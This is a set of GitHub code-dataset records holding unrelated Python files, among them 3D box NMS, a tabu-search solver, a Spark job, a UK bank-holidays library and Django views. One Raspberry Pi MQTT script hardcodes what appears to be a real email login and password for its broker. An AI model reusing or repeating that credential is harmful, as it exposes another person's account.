Must be of same size 'boxes3d'\n\n    class_agnostic: bool\n        If True, then category ID is not considered in NMS.\n        If False, then NMS is performed per-category ('class_idxs' must not be None.)\n\n    Returns\n    -------\n    keep: Tensor\n        1D integer vector that contains filtered indices to 'boxes3d' to keep after NMS.\n    \"\"\"\n    rot_boxes = boxes3d_to_rotated_boxes(boxes3d, pose_cam_global=pose_cam_global)\n    if class_agnostic:\n        class_idxs = torch.zeros_like(scores, dtype=torch.int64)\n    else:\n        assert class_idxs is not None\n    keep = batched_nms_rotated(rot_boxes.tensor, scores, class_idxs, iou_threshold)\n    return keep\n","repo_name":"TRI-ML/dd3d","sub_path":"tridet/layers/bev_nms.py","file_name":"bev_nms.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","stars":413,"dataset":"github-code","pt":"40"} {"seq_id":"2470973056","text":"import queue\n\nclass Solution:\n    def findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n\n        graph, indegree = {}, {}\n        for c in range(numCourses):\n            graph[c] = []\n            indegree[c] = 0\n        \n        for first, second in prerequisites:\n            graph[second].append(first)\n            indegree[first] += 1\n        \n        q = queue.Queue()\n        for c in range(numCourses):\n            if indegree[c] == 0:\n                q.put(c)\n        \n        order = []\n        while not q.empty():\n            v = q.get()\n            order.append(v)\n            for c in graph[v]:\n                indegree[c] -= 1\n                if indegree[c] == 0:\n                    q.put(c)\n            del graph[v]\n        \n        return order if graph == {} else []","repo_name":"oliverschwartz/leet","sub_path":"course_schedule/course_schedule_ii.py","file_name":"course_schedule_ii.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"31558615482","text":"from cn.edustar.jitar.data import Command\r\nfrom cn.edustar.jitar.util import ParamUtil,CommonUtil\r\nfrom base_action import SubjectMixiner\r\nfrom cn.edustar.jitar.pojos import PrepareCourse, PrepareCourseEdit\r\nfrom java.text import SimpleDateFormat\r\nfrom java.util import Date\r\nfrom java.io import File\r\nfrom base_action import *\r\nfrom base_blog_page import *\r\nfrom action_query import ActionQuery\r\nfrom base_preparecourse_page import *\r\n\r\nclass show_preparecourse_history_content(PrepareCoursePageService):\r\n    def __init__(self):\r\n        self.printer = response.getWriter() \r\n        self.pc_svc = __jitar__.getPrepareCourseService()\r\n        \r\n    def execute(self): \r\n        self.getBaseData() \r\n        if self.prepareCourseId == 0:\r\n            self.printer.write(u\"Invalid course identifier.\")\r\n            return\r\n        prepareCourse = self.getBasePrepareCourse()\r\n        if prepareCourse == None:\r\n            self.printer.write(u\"The requested lesson preparation could not be loaded.\")\r\n            return\r\n        if self.canView(prepareCourse) == False:\r\n            self.printer.write(u\"You do not have permission to view this content.\")\r\n            return\r\n        \r\n        prepareCourseEditId = self.params.getIntParam(\"prepareCourseEditId\")\r\n        if prepareCourseEditId == None or prepareCourseEditId == 0:\r\n            self.printer.write(u\"Please select a shared lesson plan history record.\")\r\n            return\r\n        prepareCourseEdit = self.pc_svc.getPrepareCourseEdit(prepareCourseEditId)\r\n        if prepareCourseEdit == None:\r\n            self.printer.write(u\"Failed to load the shared lesson plan history record.\")\r\n            return\r\n        \r\n        page = self.getPrepareCoursePageWithCustomSkin(prepareCourse)\r\n        widgets = [\r\n            {\"id\": \"1\", \"pageId\":0, \"columnIndex\":1, \"title\":u\"Basic lesson preparation info\", \"module\":\"show_preparecourse_info\", \"ico\":\"\", \"data\":\"\"},\r\n            {\"id\": \"placerholder1\", \"pageId\":0, \"columnIndex\":2, \"title\":\"\", \"module\":\"placeholder\", \"ico\":\"\", \"data\":\"\"},\r\n            {\"id\": \"placerholder2\", 
\"pageId\":0, \"columnIndex\":1, \"title\":\"\", \"module\":\"placeholder\", \"ico\":\"\", \"data\":\"\"},\r\n {\"id\": \"placerholder3\", \"pageId\":0, \"columnIndex\":1, \"title\":\"\", \"module\":\"placeholder\", \"ico\":\"\", \"data\":\"\"}\r\n ]\r\n qry = PrepareCourseMemberQuery(\"\"\" u.userId, u.userIcon, u.loginName,u.trueName,u.nickName\"\"\") \r\n qry.prepareCourseId = self.prepareCourse.prepareCourseId\r\n user_list = qry.query_map()\r\n prepareCourseEdit_list = self.pc_svc.getPrepareCourseEditList(self.prepareCourseId)\r\n request.setAttribute(\"prepareCourseEdit_list\", prepareCourseEdit_list)\r\n request.setAttribute(\"user_list\", user_list) \r\n request.setAttribute(\"page\", page)\r\n request.setAttribute(\"widget_list\", widgets)\r\n request.setAttribute(\"prepareCourse\", prepareCourse)\r\n request.setAttribute(\"prepareCourseEdit\", prepareCourseEdit) \r\n if prepareCourse.contentType == 2 or prepareCourse.contentType == 3 or prepareCourse.contentType == 4 or prepareCourse.contentType == 5 or prepareCourse.contentType == 100:\r\n swf = prepareCourseEdit.content\r\n if swf == None:swf = \"\"\r\n if swf.find(\".\") > -1:\r\n swf = swf[0:swf.find(\".\")]\r\n \r\n prepareCourseFileServer = request.getSession().getServletContext().getInitParameter(\"PrepareCourseFileServer\")\r\n pcFolder = CommonUtil.GetPrepareCourseFolder(request)\r\n if prepareCourseFileServer == None or prepareCourseFileServer == \"\":\r\n swfUrl = pcFolder[1] + str(self.prepareCourse.prepareCourseId) + \"/\"\r\n courseFileServer = CommonUtil.getSiteUrl(request)\r\n else:\r\n if prepareCourseFileServer.endswith(\"/\") == False:prepareCourseFileServer += \"/\"\r\n courseFileServer = prepareCourseFileServer\r\n swfUrl = prepareCourseFileServer + \"preparecoursefolder/\" + str(self.prepareCourse.prepareCourseId) + \"/\"\r\n swfUrl = swfUrl + swf + \".swf\"\r\n request.setAttribute(\"swfUrl\", swfUrl)\r\n request.setAttribute(\"courseFileServer\", courseFileServer)\r\n \r\n response.setContentType(\"text/html; charset=UTF-8\") \r\n return \"/WEB-INF/ftl/course/show_preparecourse_history_content2.ftl\"\r\n","repo_name":"yxxcrtd/jitar2.0","sub_path":"WebContent/WEB-INF/preparecourse/show_preparecourse_history_content.py","file_name":"show_preparecourse_history_content.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10379683432","text":"import time\nimport datetime\nimport argparse\n\n\nstarting_time = time.time()\nversion = \"1.0.0\"\n# The argument\nparser = argparse.ArgumentParser(prog='main')\nparser.add_argument(\"--version\", required=True,\n help='Print the version of the code', action='store_true')\n\nargs = parser.parse_args()\nif args.version:\n print(f\"version: {version}\")\n\n\nendig_time = time.time()\ntime_diff = endig_time - starting_time\n\nflag = True\n\nwhile flag:\n print(\"{} Running for {:.2f} seconds\".format(\n datetime.datetime.now(), time_diff))\n time.sleep(5)\n time_diff += 5\n","repo_name":"ahadnur/git_auto","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29153793150","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 20 20:54:03 2021\n\n@author: Teoman\n\"\"\"\n\nimport time\nimport numpy as np\nfrom scipy.optimize import linprog\nimport random\n\ny=[80,90,110,120,100,120] #capacity list \n\nd_j=[36,42,34,50,27,30,43] 
#demand list\n\nyi=[220,240,260,275,240,230] #fixed cost\n\n#km cost list\nd_ij=[[18,23,19,21,24,17,9],\n      [21,18,17,23,11,18,20],\n      [27,18,17,20,23,9,18],\n      [16,23,9,31,21,23,10],\n      [31,20,18,19,10,17,18],\n      [18,17,29,21,22,18,8]]\n\ndaily=[0.15,0.18,0.20,0.18,0.15,0.17] #daily cost\n\ndef calculate_cij(): #finds Cij\n    new_cij=np.zeros((6,7))\n    for j in range (7):\n        for i in range (6):\n            new_cij[i][j]=(d_ij[i][j]*0.06*2*d_j[j]+daily[i]*d_j[j])\n    return new_cij \n\ndef create_solution():\n    while True:\n        solution=np.zeros(6)\n        for i in range(6):\n            solution[i]=random.choice([0, 1])\n            if np.sum(np.array(y)*solution)>np.sum(d_j):\n                break\n        if np.sum(np.array(y)*solution)>np.sum(d_j):\n            break\n    random.shuffle(solution)\n    opened_facilities=[]\n    \n    for i, j in enumerate(solution):\n        if j == 1:\n            opened_facilities.append(i)\n    \n    return(opened_facilities)\n\n\ndef simplex(opened_facilities,new_cij): # solve the simplex model\n    v1=opened_facilities\n    \n    c=[] #objective function coeff\n    coef_a=np.zeros((len(v1),len(v1)*7)) #capacity cons left side of equation\n    a_esit=[] #capacity cons right side of equation\n    coef_b=np.zeros((7,len(v1)*7)) #demand cons left side of equation\n    b_esit=[1]*7 #demand cons right side of equation \n    sabit=0 #accumulator for the fixed costs\n    \n    for i in range(len(v1)):\n        j=i*7\n        coef_a[i][j:j+7]=d_j \n    for i in range(7):\n        coef_b[i][i::7]=[1]*len(v1)\n    for i in v1:\n        a_esit.append(y[i]) \n    a_esit=np.array(a_esit) \n    for i in v1:\n        c.append(new_cij[i]) \n    c=np.concatenate(c).ravel().tolist()\n    for i in v1:\n        sabit=yi[i]+sabit #adding the fixed costs\n\n    #solving simplex \n    res=linprog(c,A_ub=coef_a,b_ub=a_esit,A_eq=coef_b,b_eq=b_esit,method='revised simplex')\n    upper_b=round(res.fun, ndigits=2)+sabit\n    x_ij=res.x\n    x_ij=x_ij.round(3)\n    x_ij=x_ij.reshape((len(opened_facilities) , len(d_j)))    \n    return upper_b,x_ij\n    \ndef find_new_solutions(TabuList,FeasibleSet,opened,new_cij):\n    cost=10000\n    closed_one=[]\n    added_one=[]\n    for i in opened:\n        for j in FeasibleSet:\n            open_cand=opened.copy()\n            open_cand.remove(i)\n            open_cand.append(j)\n            \n            new_cost,new_x_ij=simplex(open_cand,new_cij)\n            if new_cost<cost and (i,j) not in TabuList: # reconstructed: the original text between 'new_cost' and 'maxSize' was lost\n                cost=new_cost\n                closed_one=i\n                added_one=j\n    return(cost,closed_one,added_one)\n\ndef main(maxSize): # reconstructed main loop; part of the original body was lost\n    new_cij=calculate_cij()\n    opened=create_solution()\n    FeasibleSet=[i for i in range(6) if i not in opened]\n    TabuList=[]\n    CurrentBest,x_ij=simplex(opened,new_cij)\n    h=1\n    while True:\n        open_cost,closed_one,added_one=find_new_solutions(TabuList,FeasibleSet,opened,new_cij)\n        opened.remove(closed_one)\n        opened.append(added_one)\n        FeasibleSet.remove(added_one)\n        FeasibleSet.append(closed_one)\n        open_cost,x_ij=simplex(opened,new_cij)\n        TabuList.append((closed_one,added_one))\n        if len(TabuList)>maxSize:\n            TabuList.pop(0)\n    \n        print(\"-------------------------\")\n        print(\"iteration:\",h)\n        print(\"opened facilities\",opened)\n        print(\"FeasibleSet:\",FeasibleSet)\n        print(\"tabu list:\",TabuList)\n        print(\"x_ij:\")\n        print(x_ij)\n        print(\"iteration's cost:\",open_cost)\n        print(\"current best\",CurrentBest)\n    \n    \n        if open_cost==CurrentBest:\n            break\n    \n        if open_cost < CurrentBest:\n            CurrentBest = open_cost\n    \n        h+=1\n    \n    return(CurrentBest,opened)\n\nmain(2)\n\n\n    ","repo_name":"teoinan/heuristic-methods","sub_path":"tabu_seach.py","file_name":"tabu_seach.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"42338766341","text":"import torch\nfrom torch import nn\nfrom copy import deepcopy\n\nclass DenseBlock2d(nn.Module):\n    def __init__(\n        self,\n        in_channels: int,\n        out_channels: int,\n        kernel_size: int = 3,\n        stride: int = 1,\n        padding: int = 1,\n        dropout: float = 0.0,\n        num_blocks: int = 1,\n        normalization: nn.Module = None,\n    ):\n        super().__init__()\n\n        convs = []\n\n        for conv_idx in range(num_blocks):\n            if normalization:\n                convs.append(deepcopy(normalization))\n            else:\n                convs.append(nn.BatchNorm2d(in_channels))\n\n            convs.append(nn.ReLU(inplace = True))\n            \n            if conv_idx == num_blocks - 1:\n                convs.append(\n                    nn.Conv2d(\n                        in_channels,\n                        out_channels,\n                        kernel_size = kernel_size,\n                        stride = stride,\n                        
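                        # (annotation, not in the original file) only this final conv of the
                        # dense block maps to out_channels; the earlier convs in the else
                        # branch below keep in_channels so the running concatenation works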
padding = padding,\n bias = False\n )\n )\n else:\n convs.append(\n nn.Conv2d(\n in_channels,\n in_channels,\n kernel_size = kernel_size,\n stride = stride,\n padding = padding,\n bias = False\n )\n )\n \n self.convs = nn.Sequential(*convs)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n y = self.convs(x)\n y = self.dropout(y)\n y = torch.cat([x, y], 1)\n return y\n\nif __name__ == '__main__':\n from torchinfo import summary\n block = DenseBlock2d(16, 32, 3, 1, 1, 0.5, num_blocks = 3, normalization = nn.GroupNorm(8, 16))\n summary(block, (8, 16, 64, 64))\n # print(block(torch.randn(8, 16, 64, 64)).shape)","repo_name":"braindotai/Dxeon","sub_path":"src/dxeon/modules/dense_block.py","file_name":"dense_block.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25263114334","text":"from nmigen import *\nfrom nmigen.hdl.rec import *\n\nfrom utils import bitcount\nfrom vga_timing import VGATiming\n\nclass VGALayout(Layout):\n def __init__(self, w: int, h: int):\n super().__init__([\n (\"hsync\", 1),\n (\"vsync\", 1),\n (\"visible\", 1),\n (\"x\", bitcount(w)),\n (\"y\", bitcount(h)),\n (\"r\", 1),\n (\"g\", 1),\n (\"b\", 1),\n ])\n\nclass VGABus(Record):\n def __init__(self, timing: VGATiming):\n layout = VGALayout(timing.vx, timing.vy)\n super().__init__(layout)\n self.timing = timing\n\n def forward(self, m: Module, src):\n m.d.comb += [\n self.hsync.eq(src.hsync),\n self.vsync.eq(src.vsync),\n self.visible.eq(src.visible),\n ]\n m.d.px += [\n self.x.eq(src.x),\n self.y.eq(src.y),\n self.r.eq(src.r),\n self.g.eq(src.g),\n self.b.eq(src.b),\n ]\n","repo_name":"quells/tiny-gfx","sub_path":"src/vga_bus.py","file_name":"vga_bus.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"37575666730","text":"import sys\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\n\nfrom pyspark.sql import SparkSession, functions, types\n\n@functions.udf(returnType=types.StringType())\ndef path_to_hour(path):\n path_split = path.split('/')\n ex_from = len('pagecounts-')\n ex_to = ex_from + len('20160801-12')\n return path_split[-1][ex_from:ex_to] #format YYYYMMDD-HH\n\n\n\ndef main(inputs, output):\n wikipedia_schema = types.StructType([\n types.StructField('language', types.StringType()),\n types.StructField('title', types.StringType()),\n types.StructField('views', types.IntegerType()),\n types.StructField('bytes', types.IntegerType())\n ])\n\n wikipedia = spark.read.csv(inputs, sep = ' ', schema = wikipedia_schema).withColumn('filename', functions.input_file_name())\n wiki_with_hour = wikipedia.withColumn('hour', path_to_hour(wikipedia['filename'])) #add a column with its time: YYYYMMDD-HH\n\n filtered = wiki_with_hour.filter((wiki_with_hour['language'] == 'en') & (wiki_with_hour['title'] != \"Main Page\") & (wiki_with_hour['title'].startswith(\"Special:\") == False))\n wiki = filtered.cache()\n\n max_views = wiki.groupby('hour').agg(functions.max(wiki['views']).alias('views'))\n #joined = max_views.join(wiki, ['hour', 'views'],'inner') #without broadcast hint\n joined = wiki.join(max_views.hint('broadcast'), ['hour', 'views'])\n output_data = joined.select(joined['hour'], joined['title'], joined['views']).orderBy(joined['hour'], joined['title'])\n \n output_data.write.json(output, mode = 'overwrite')\n output_data.explain()\n\n\nif __name__ == 
'__main__':\n inputs = sys.argv[1]\n output = sys.argv[2]\n spark = SparkSession.builder.appName('wikipedia popular df').getOrCreate()\n assert spark.version >= '3.0' # make sure we have Spark 3.0+\n spark.sparkContext.setLogLevel('WARN')\n sc = spark.sparkContext\n main(inputs, output)\n","repo_name":"xxxibdara/Big_Data_Works_732","sub_path":"A6/wikipedia_popular_df.py","file_name":"wikipedia_popular_df.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74330852601","text":"from Facade import *\n\n\ndef CalibreCropping(filename):\n lol = Facade(filename)\n lol.img_editor.crop(crop_params)\n cv2.imshow(\"lol\", lol.img_editor.img)\n cv2.waitKey()\n\n\n# CalibreCropping(\"misha1.jpg\")\n\nlol1 = Facade(\"misha1.jpg\")\n# lol2 = Facade(\"v-26.jpg\")\n\nlol1.write_finger_scan(\"lol81.jpg\")\n# lol2.write_finger_scan(\"lol73.jpg\")\n\n# print(CompareFingerScans(lol1, lol2))\n","repo_name":"Ulyana75/FingerScaner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2869324324","text":"import RPi.GPIO as GPIO\r\nimport time\r\nimport paho.mqtt.client as mqtt\r\nfrom datetime import datetime\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\nbtn1=12\r\nbtn2=13\r\nled1=7\r\nled2=11\r\nf=open(\"Datos.dat\",\"a\")\r\nf.write(\"Datos recolectados\\n\")\r\nf.close()\r\n\r\ndef on_message(client,obj,msg):\r\n print(msg.topic+\" \"+str(msg.qos)+\" \"+msg.payload.decode('utf-8'))\r\n\r\ndef main():\r\n bot1=0\r\n bot2=0\r\n mqttc=mqtt.Client()\r\n mqttc.on_message=on_message\r\n mqttc.username_pw_set(\"jomsk@hotmail.com\",\"Jomsk4all1996\")\r\n mqttc.connect(\"maqiatto.com\",1883)\r\n mqttc.subscribe(\"jomsk@hotmail.com/IoT1\",0)\r\n GPIO.setup(led1,GPIO.OUT)\r\n GPIO.setup(led2,GPIO.OUT)\r\n GPIO.setup(btn1,GPIO.IN)\r\n GPIO.setup(btn2,GPIO.IN)\r\n nbtn=0\r\n while(1):\r\n mqttc.loop()\r\n bot1=GPIO.input(btn1)\r\n bot2=GPIO.input(btn2)\r\n f=open(\"Datos.dat\",\"a\")\r\n fecha=datetime.now()\r\n fechaAc=str(fecha).split(\".\")[0]\r\n if(bot1==1):\r\n \r\n GPIO.output(led1,1)\r\n f.write(fechaAc+\" Boton1 Presionado\\n\")\r\n f.close()\r\n time.sleep(1)\r\n GPIO.output(led1,0)\r\n nbtn=1\r\n mqttc.publish(\"jomsk@hotmail.com/IoT\",str(nbtn))\r\n \r\n if(bot2==1):\r\n \r\n GPIO.output(led2,1)\r\n f.write(fechaAc+\" Boton2 Presionado\\n\")\r\n f.close()\r\n time.sleep(1)\r\n GPIO.output(led2,0)\r\n nbtn=2\r\n mqttc.publish(\"jomsk@hotmail.com/IoT\",str(nbtn))\r\n \r\n \r\n ","repo_name":"jdvelin96/congenial-engine","sub_path":"static/js/Untitled-1.py","file_name":"Untitled-1.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34978885989","text":"import tensorflow as tf \r\nimport numpy as np\r\n\r\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0]) \r\nys = np.array([-3.0, -1.0, 1.0, 3.0, 5.0, 7.0]) \r\n\r\n#trainable variables \r\nw = tf.Variable(np.random.random(), trainable=True) \r\nb = tf.Variable(np.random.random(), trainable=True) \r\n\r\n\r\n# loss \r\ndef simple_loss(real_y, pred_y) : \r\n return tf.abs(real_y - pred_y) \r\n\r\nlearning_rate = 0.001\r\n\r\ndef fit_data(x_real, y_real): \r\n\r\n with tf.GradientTape(persistent=True) as tape: \r\n pred_y = w * x_real + b \r\n reg_loss = simple_loss(y_real, pred_y) \r\n\r\n w_gradient = tape.gradient(reg_loss, w) \r\n 
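# (added note) the tape is created with persistent=True so tape.gradient can be called twice, once for w (above) and once for b (below); a non-persistent tape allows only one gradient call\r\n    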
b_gradient = tape.gradient(reg_loss, b) \r\n\r\n w.assign_sub(w_gradient * learning_rate) \r\n b.assign_sub(b_gradient * learning_rate) \r\n\r\n\r\nfor _ in range(500) : \r\n fit_data(xs, ys) \r\n\r\nprint(f\"w = {w.numpy()} + b = {b.numpy()}\") ","repo_name":"sasidhar-programmer/Tensorflow_Advance_Techniques","sub_path":"2-custom_and_distributed_training/pratice_py/2_gradient_tape.py","file_name":"2_gradient_tape.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"40"} +{"seq_id":"5746970657","text":"import datetime\nimport functools\nimport gettext\nimport json\nimport logging\nimport pathlib\n\nimport requests\n\n__all__ = ('BankHolidays',)\nlogger = logging.getLogger(__name__)\n\n\nclass BankHolidays:\n \"\"\"\n Tool to load UK bank holidays from GOV.UK (see https://www.gov.uk/bank-holidays)\n\n NB: Bank holidays vary between parts of the UK so GOV.UK provide separate lists for different \"divisions\".\n Methods of this class will default to only considering bank holidays common to *all* divisions\n unless a specific division is provided.\n \"\"\"\n\n source_url = 'https://www.gov.uk/bank-holidays.json'\n\n # division constants\n ENGLAND_AND_WALES = 'england-and-wales'\n SCOTLAND = 'scotland'\n NORTHERN_IRELAND = 'northern-ireland'\n ALL_DIVISIONS = (ENGLAND_AND_WALES, SCOTLAND, NORTHERN_IRELAND)\n\n @classmethod\n def load_backup_data(cls):\n backup_path = pathlib.Path(__file__).parent / 'bank-holidays.json'\n with backup_path.open() as f:\n return json.load(f)\n\n def __init__(self, locale=None, weekend=(5, 6), use_cached_holidays=False):\n \"\"\"\n Load UK bank holidays\n :param locale: the locale into which holidays should be translated; defaults to no translation\n :param weekend: days of the week that are never work days; defaults to Saturday and Sunday\n :param use_cached_holidays: use the cached local copy of the holiday list\n \"\"\"\n self._get_known_holiday_date_set_cache = {}\n self.weekend = set(weekend)\n if use_cached_holidays:\n data = self.load_backup_data()\n else:\n try:\n logger.debug(f'Downloading bank holidays from {self.source_url}')\n data = requests.get(self.source_url).json()\n except (requests.RequestException, ValueError):\n logger.warning('Using backup bank holiday data')\n data = self.load_backup_data()\n\n if locale:\n trans = gettext.translation(\n 'messages',\n localedir=pathlib.Path(__file__).parent / 'locale',\n languages=[locale],\n fallback=True,\n )\n else:\n trans = gettext.NullTranslations()\n trans = trans.ugettext if hasattr(trans, 'ugettext') else trans.gettext\n\n def _(text):\n if not text:\n return text\n return trans(text)\n\n def map_holiday(holiday):\n try:\n return {\n 'title': _(holiday['title']),\n 'date': datetime.datetime.strptime(holiday['date'], '%Y-%m-%d').date(),\n 'notes': _(holiday.get('notes', '')),\n 'bunting': bool(holiday.get('bunting')),\n }\n except (KeyError, ValueError):\n logger.warning('Holiday could not be parsed')\n logger.debug(holiday, exc_info=True)\n\n self.data = {\n division: sorted(filter(None, map(map_holiday, item.get('events', []))),\n key=lambda e: e['date'])\n for division, item in data.items()\n }\n\n def __iter__(self):\n \"\"\"\n Iterates over the current year's holidays that are common to *all* divisions\n :return: list of dicts with titles, dates, etc\n \"\"\"\n return iter(self.get_holidays(year=datetime.date.today().year))\n\n def get_holidays(self, division=None, year=None):\n \"\"\"\n Gets a list of all known 
bank holidays, optionally filtered by division and/or year\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param year: defaults to all available years\n :return: list of dicts with titles, dates, etc\n \"\"\"\n if division:\n holidays = self.data[division]\n else:\n holidays = self.data[self.ENGLAND_AND_WALES]\n dates_in_common = functools.reduce(\n set.intersection,\n (\n set(map(lambda holiday: holiday['date'], division_holidays))\n for division, division_holidays in self.data.items()\n ),\n )\n holidays = filter(lambda holiday: holiday['date'] in dates_in_common, holidays)\n if year:\n holidays = filter(lambda holiday: holiday['date'].year == year, holidays)\n return list(holidays)\n\n def _get_known_holiday_date_set(self, division=None):\n \"\"\"\n Returns an unordered set of all known bank holiday dates\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n \"\"\"\n if division not in self._get_known_holiday_date_set_cache:\n self._get_known_holiday_date_set_cache[division] = set(\n holiday['date']\n for holiday in self.get_holidays(division=division)\n )\n return self._get_known_holiday_date_set_cache[division]\n\n def is_holiday(self, date, division=None):\n \"\"\"\n True if the date is a known bank holiday\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param date: the date to check\n :param division: see division constants; defaults to common holidays\n :return: bool\n \"\"\"\n return date in self._get_known_holiday_date_set(division=division)\n\n def is_work_day(self, date, division=None):\n \"\"\"\n True if the date is not a weekend or a known bank holiday\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param date: the date to check\n :param division: see division constants; defaults to common holidays\n :return: bool\n \"\"\"\n return date.weekday() not in self.weekend and date not in self._get_known_holiday_date_set(division=division)\n\n def get_next_holiday(self, division=None, date=None):\n \"\"\"\n Returns the next known bank holiday\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param date: search starting from this date; defaults to today\n :return: dict or None\n \"\"\"\n date = date or datetime.date.today()\n for holiday in self.get_holidays(division=division):\n if holiday['date'] > date:\n return holiday\n\n def get_prev_holiday(self, division=None, date=None):\n \"\"\"\n Returns the previous known bank holiday\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param date: search starting from this date; defaults to today\n :return: dict or None\n \"\"\"\n date = date or datetime.date.today()\n for holiday in reversed(self.get_holidays(division=division)):\n if holiday['date'] < date:\n return holiday\n\n def get_next_work_day(self, division=None, date=None):\n \"\"\"\n Returns the next work day, skipping weekends and bank holidays\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param date: search starting from this date; defaults to today\n :return: datetime.date; NB: get_next_holiday returns a 
dict\n \"\"\"\n date = date or datetime.date.today()\n one_day = datetime.timedelta(days=1)\n while True:\n date += one_day\n if self.is_work_day(date, division=division):\n return date\n\n def get_prev_work_day(self, division=None, date=None):\n \"\"\"\n Returns the previous work day, skipping weekends and bank holidays\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param date: search starting from this date; defaults to today\n :return: datetime.date; NB: get_next_holiday returns a dict\n \"\"\"\n date = date or datetime.date.today()\n one_day = datetime.timedelta(days=1)\n while True:\n date -= one_day\n if self.is_work_day(date, division=division):\n return date\n\n def holidays_after(self, division=None, date=None):\n \"\"\"\n Yields known bank holidays in chronological order\n NB: If no division is specified, only holidays common to *all* divisions are yielded.\n :param division: see division constants; defaults to common holidays\n :param date: starting after this date; defaults to today\n \"\"\"\n date = date or datetime.date.today()\n holidays = self.get_holidays(division=division)\n yield from filter(lambda holiday: holiday['date'] > date, holidays)\n\n def holidays_before(self, division=None, date=None):\n \"\"\"\n Yields known bank holidays in reverse chronological order\n NB: If no division is specified, only holidays common to *all* divisions are yielded.\n :param division: see division constants; defaults to common holidays\n :param date: starting before this date; defaults to today\n \"\"\"\n date = date or datetime.date.today()\n holidays = reversed(self.get_holidays(division=division))\n yield from filter(lambda holiday: holiday['date'] < date, holidays)\n\n def work_days_after(self, division=None, date=None):\n \"\"\"\n Yields an infinite series of work days in chronological order skipping weekends and known bank holidays\n NB: If no division is specified, only holidays common to *all* divisions are yielded.\n :param division: see division constants; defaults to common holidays\n :param date: starting after this date; defaults to today\n \"\"\"\n date = date or datetime.date.today()\n one_day = datetime.timedelta(days=1)\n while True:\n date += one_day\n if self.is_work_day(date, division=division):\n yield date\n\n def work_days_before(self, division=None, date=None):\n \"\"\"\n Yields an infinite series of work days in reverse chronological order skipping weekends and known bank holidays\n NB: If no division is specified, only holidays common to *all* divisions are yielded.\n :param division: see division constants; defaults to common holidays\n :param date: starting before this date; defaults to today\n \"\"\"\n date = date or datetime.date.today()\n one_day = datetime.timedelta(days=1)\n while True:\n date -= one_day\n if self.is_work_day(date, division=division):\n yield date\n","repo_name":"ministryofjustice/govuk-bank-holidays","sub_path":"govuk_bank_holidays/bank_holidays.py","file_name":"bank_holidays.py","file_ext":"py","file_size_in_byte":10978,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"40"} +{"seq_id":"39379066878","text":"from .forms import ResendActivationEmailForm, SettingsForm\nfrom .helpers import mk_paginator, add_csrf\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core import signing\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom 
django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.template import RequestContext\nfrom django.template.loader import render_to_string\nfrom django.shortcuts import render, get_object_or_404, render_to_response\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\n\ndef err404(request):\n    return render(request, 'errorpages/404.html', status=404)\n\ndef err500(request):\n    return render(request, 'errorpages/50x.html', status=500)\n\ndef view_profile(request, **kwargs):\n    context = {}\n\n    username = kwargs.get('username')\n    if username:\n        context['profile'] = get_object_or_404(User, username=username)\n    elif request.user.is_authenticated():\n        context['profile'] = request.user\n    else:\n        raise Http404 # Case where the user reaches this view anonymously for a non-existent user\n\n    return render(request, 'registration/profile.html', context)\n\n@login_required\ndef edit_settings(request, **kwargs):\n    user = request.user\n    form = SettingsForm(initial={'email': request.user.email}, instance=request.user.profile)\n\n    if request.method == 'POST':\n        form = SettingsForm(request.POST, request.FILES, instance=request.user.profile)\n\n        if form.has_changed():\n            if form.is_valid():\n                up = form.save(commit=False)\n                up.user = request.user\n                up.save()\n\n                email = form.cleaned_data['email']\n                user.email = email\n                user.save()\n\n                messages.success(request, 'Profile details updated.')\n\n    return render_to_response('registration/settings.html', {\n        'form': form,\n        'profile': request.user.profile,\n    }, context_instance=RequestContext(request))\n\ndef resend_activation_email(request):\n\n    email_body_template = 'registration/activation_email.txt'\n    